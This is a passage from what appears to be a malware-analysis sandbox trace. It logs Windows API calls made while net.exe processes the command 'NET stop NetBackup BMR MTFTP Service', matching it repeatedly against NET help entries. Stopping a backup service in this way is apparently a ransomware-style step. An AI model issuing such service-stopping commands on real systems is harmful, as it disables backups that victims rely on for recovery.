_String2="SERVICES\r\nNET START can be used to s", _MaxCount=0x24) returned -5 [0100.320] LocalFree (hMem=0x585510) returned 0x0 [0100.320] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x483 [0100.320] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="SYNTAX\r\nThe following conventions ar", _MaxCount=0x24) returned -5 [0100.320] LocalFree (hMem=0x585510) returned 0x0 [0100.320] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xa86 [0100.320] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NAMES\r\nThe following types of names ", _MaxCount=0x24) returned 4 [0100.320] LocalFree (hMem=0x585510) returned 0x0 [0100.321] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x54 [0100.321] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="\r\nFor more information on tools see ", _MaxCount=0x24) returned 97 [0100.321] LocalFree (hMem=0x585510) returned 0x0 [0100.321] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xad [0100.321] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:", _MaxCount=0x1c) returned 18 [0100.321] LocalFree (hMem=0x585510) returned 0x0 [0100.321] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x2e [0100.321] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET COMPUTER\r\n\\\\computername", _MaxCount=0x1c) returned 16 [0100.321] LocalFree (hMem=0x585510) returned 0x0 [0100.321] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x7d [0100.321] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET CONFIG SERVER\r\n[/AUTODIS", _MaxCount=0x1c) returned 16 [0100.321] LocalFree (hMem=0x585510) returned 0x0 [0100.321] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x26 [0100.321] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET CONFIG\r\n[SERVER | WORKST", _MaxCount=0x1c) returned 16 [0100.321] LocalFree (hMem=0x585510) returned 0x0 [0100.321] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x19 [0100.321] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 16 [0100.321] LocalFree (hMem=0x585510) returned 0x0 [0100.322] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x1b [0100.322] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1c) returned 13 [0100.322] LocalFree (hMem=0x585510) returned 0x0 [0100.322] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xbe [0100.322] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET GROUP\r\n[groupname [/COMM", _MaxCount=0x1c) returned 12 [0100.322] LocalFree (hMem=0x585510) returned 0x0 [0100.322] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x33 [0100.322] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET HELP\r\ncommand\r\n -or-", _MaxCount=0x1c) returned 11 [0100.322] LocalFree (hMem=0x585510) returned 0x0 [0100.322] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x19 [0100.322] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1c) returned 11 [0100.322] LocalFree (hMem=0x585510) returned 0x0 [0100.322] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xc1 [0100.322] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET LOCALGROUP\r\n[groupname [", _MaxCount=0x1c) returned 7 [0100.322] LocalFree (hMem=0x585510) returned 0x0 [0100.322] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x16 [0100.322] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 3 [0100.322] LocalFree (hMem=0x585510) returned 0x0 [0100.323] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x33 [0100.323] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET SESSION\r\n[\\\\computername", _MaxCount=0x1c) returned 15 [0100.323] LocalFree (hMem=0x585510) returned 0x0 [0100.323] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x234 [0100.323] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1c) returned 12 [0100.323] LocalFree (hMem=0x585510) returned 0x0 [0100.323] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x13 [0100.323] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START BROWSER\r\n", _MaxCount=0x1c) returned 14 [0100.323] LocalFree (hMem=0x585510) returned 0x0 [0100.323] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x14 [0100.323] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1c) returned 14 [0100.323] LocalFree (hMem=0x585510) returned 0x0 [0100.323] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x14 [0100.323] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1c) returned 14 [0100.323] LocalFree (hMem=0x585510) returned 0x0 [0100.324] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x15 [0100.324] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START MESSENGER\r\n", _MaxCount=0x1c) returned 14 [0100.324] LocalFree (hMem=0x585510) returned 0x0 [0100.324] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x15 [0100.324] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START NET LOGON\r\n", _MaxCount=0x1c) returned 14 [0100.324] LocalFree (hMem=0x585510) returned 0x0 [0100.324] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x16 [0100.324] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1c) returned 14 [0100.324] LocalFree (hMem=0x585510) returned 0x0 [0100.324] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x11 [0100.324] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START RPCSS\r\n", _MaxCount=0x1c) returned 14 [0100.324] LocalFree (hMem=0x585510) returned 0x0 [0100.324] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x14 [0100.324] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1c) returned 14 [0100.325] LocalFree (hMem=0x585510) returned 0x0 [0100.325] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x12 [0100.325] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START SERVER\r\n", _MaxCount=0x1c) returned 14 [0100.325] LocalFree (hMem=0x585510) returned 0x0 [0100.325] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xf [0100.325] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START UPS\r\n", _MaxCount=0x1c) returned 14 [0100.325] LocalFree (hMem=0x585510) returned 0x0 [0100.325] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x17 [0100.325] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1c) returned 14 [0100.325] LocalFree (hMem=0x585510) returned 0x0 [0100.325] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x18 [0100.325] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1c) returned 14 [0100.325] LocalFree (hMem=0x585510) returned 0x0 [0100.325] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x2a [0100.325] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET STATISTICS\r\n[WORKSTATION", _MaxCount=0x1c) returned 14 [0100.325] LocalFree (hMem=0x585510) returned 0x0 [0100.325] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x15 [0100.326] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 19 [0100.326] LocalFree (hMem=0x585510) returned 0x0 [0100.326] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x58 [0100.326] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET TIME\r\n\r\n[\\\\computername ", _MaxCount=0x1c) returned -1 [0100.326] LocalFree (hMem=0x585510) returned 0x0 [0100.326] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x184 [0100.326] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET USE\r\n[devicename | *] [\\", _MaxCount=0x1c) returned -2 [0100.326] LocalFree (hMem=0x585510) returned 0x0 [0100.326] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xc7 [0100.326] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET USER\r\n[username [passwor", _MaxCount=0x1c) returned -2 [0100.326] LocalFree (hMem=0x585510) returned 0x0 [0100.326] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x47 [0100.326] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET VIEW\r\n[\\\\computername [/", _MaxCount=0x1c) returned -3 [0100.326] LocalFree (hMem=0x585510) returned 0x0 [0100.326] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xc2 [0100.326] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NET\r\n [ ACCOUNTS | COMPUT", _MaxCount=0x1c) returned 19 [0100.326] LocalFree (hMem=0x585510) returned 0x0 [0100.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x319 [0100.327] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="SERVICES\r\nNET START can be u", _MaxCount=0x1c) returned -5 [0100.327] LocalFree (hMem=0x585510) returned 0x0 [0100.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x483 [0100.327] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="SYNTAX\r\nThe following conven", _MaxCount=0x1c) returned -5 [0100.327] LocalFree (hMem=0x585510) returned 0x0 [0100.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xa86 [0100.327] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="NAMES\r\nThe following types o", _MaxCount=0x1c) returned 4 [0100.327] LocalFree (hMem=0x585510) returned 0x0 [0100.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x54 [0100.327] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP", _String2="\r\nFor more information on to", _MaxCount=0x1c) returned 97 [0100.327] LocalFree (hMem=0x585510) returned 0x0 [0100.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xad [0100.327] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET ACCOUNTS\r\n[/FORCEL", _MaxCount=0x16) returned 18 [0100.327] LocalFree (hMem=0x585510) returned 0x0 [0100.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x2e [0100.328] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET COMPUTER\r\n\\\\comput", _MaxCount=0x16) returned 16 [0100.328] LocalFree (hMem=0x585510) returned 0x0 [0100.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x7d [0100.328] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET CONFIG SERVER\r\n[/A", _MaxCount=0x16) returned 16 [0100.328] LocalFree (hMem=0x585510) returned 0x0 [0100.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x26 [0100.328] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET CONFIG\r\n[SERVER | ", _MaxCount=0x16) returned 16 [0100.328] LocalFree (hMem=0x585510) returned 0x0 [0100.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x19 [0100.328] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET CONTINUE\r\nservice\r", _MaxCount=0x16) returned 16 [0100.328] LocalFree (hMem=0x585510) returned 0x0 [0100.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x1b [0100.328] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET FILE\r\n[id [/CLOSE]", _MaxCount=0x16) returned 13 [0100.328] LocalFree (hMem=0x585510) returned 0x0 [0100.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xbe [0100.328] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET GROUP\r\n[groupname ", _MaxCount=0x16) returned 12 [0100.328] LocalFree (hMem=0x585510) returned 0x0 [0100.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x33 [0100.328] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x16) returned 11 [0100.328] LocalFree (hMem=0x585510) returned 0x0 [0100.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x19 [0100.329] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET HELPMSG\r\nmessage#\r", _MaxCount=0x16) returned 11 [0100.329] LocalFree (hMem=0x585510) returned 0x0 [0100.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0xc1 [0100.329] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET LOCALGROUP\r\n[group", _MaxCount=0x16) returned 7 [0100.329] LocalFree (hMem=0x585510) returned 0x0 [0100.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x16 [0100.329] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x16) returned 3 [0100.329] LocalFree (hMem=0x585510) returned 0x0 [0100.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x33 [0100.329] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET SESSION\r\n[\\\\comput", _MaxCount=0x16) returned 15 [0100.329] LocalFree (hMem=0x585510) returned 0x0 [0100.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x234 [0100.329] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET SHARE\r\nsharename\r\n", _MaxCount=0x16) returned 12 [0100.329] LocalFree (hMem=0x585510) returned 0x0 [0100.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x13 [0100.329] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START BROWSER\r\n", _MaxCount=0x16) returned 14 [0100.329] LocalFree (hMem=0x585510) returned 0x0 [0100.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x14 [0100.329] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x16) returned 14 [0100.329] LocalFree (hMem=0x585510) returned 0x0 [0100.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x14 [0100.330] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START EVENTLOG\r\n", _MaxCount=0x16) returned 14 [0100.330] LocalFree (hMem=0x585510) returned 0x0 [0100.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="唐X⡋盺縷\x14唐X\x14") returned 0x15 [0100.330] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START MESSENGER\r\n", _MaxCount=0x16) returned 14 [0100.330] LocalFree (hMem=0x585510) returned 0x0 [0100.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="甐X⡋盺縷\x14唐X\x14") returned 0x15 [0100.330] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START NET LOGON\r\n", _MaxCount=0x16) returned 14 [0100.330] LocalFree (hMem=0x587510) returned 0x0 [0100.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14甐X\x14") returned 0x16 [0100.330] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x16) returned 14 [0100.330] LocalFree (hMem=0x589510) returned 0x0 [0100.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x11 [0100.330] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START RPCSS\r\n", _MaxCount=0x16) returned 14 [0100.330] LocalFree (hMem=0x589510) returned 0x0 [0100.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x14 [0100.330] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START SCHEDULE\r\n", _MaxCount=0x16) returned 14 [0100.330] LocalFree (hMem=0x589510) returned 0x0 [0100.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x12 [0100.331] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START SERVER\r\n", _MaxCount=0x16) returned 14 [0100.331] LocalFree (hMem=0x589510) returned 0x0 [0100.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0xf [0100.331] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START UPS\r\n", _MaxCount=0x16) returned 14 [0100.331] LocalFree (hMem=0x589510) returned 0x0 [0100.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x17 [0100.331] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START WORKSTATION\r", _MaxCount=0x16) returned 14 [0100.331] LocalFree (hMem=0x589510) returned 0x0 [0100.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x18 [0100.331] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET START\r\n[service]\r\n", _MaxCount=0x16) returned 14 [0100.331] LocalFree (hMem=0x589510) returned 0x0 [0100.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, 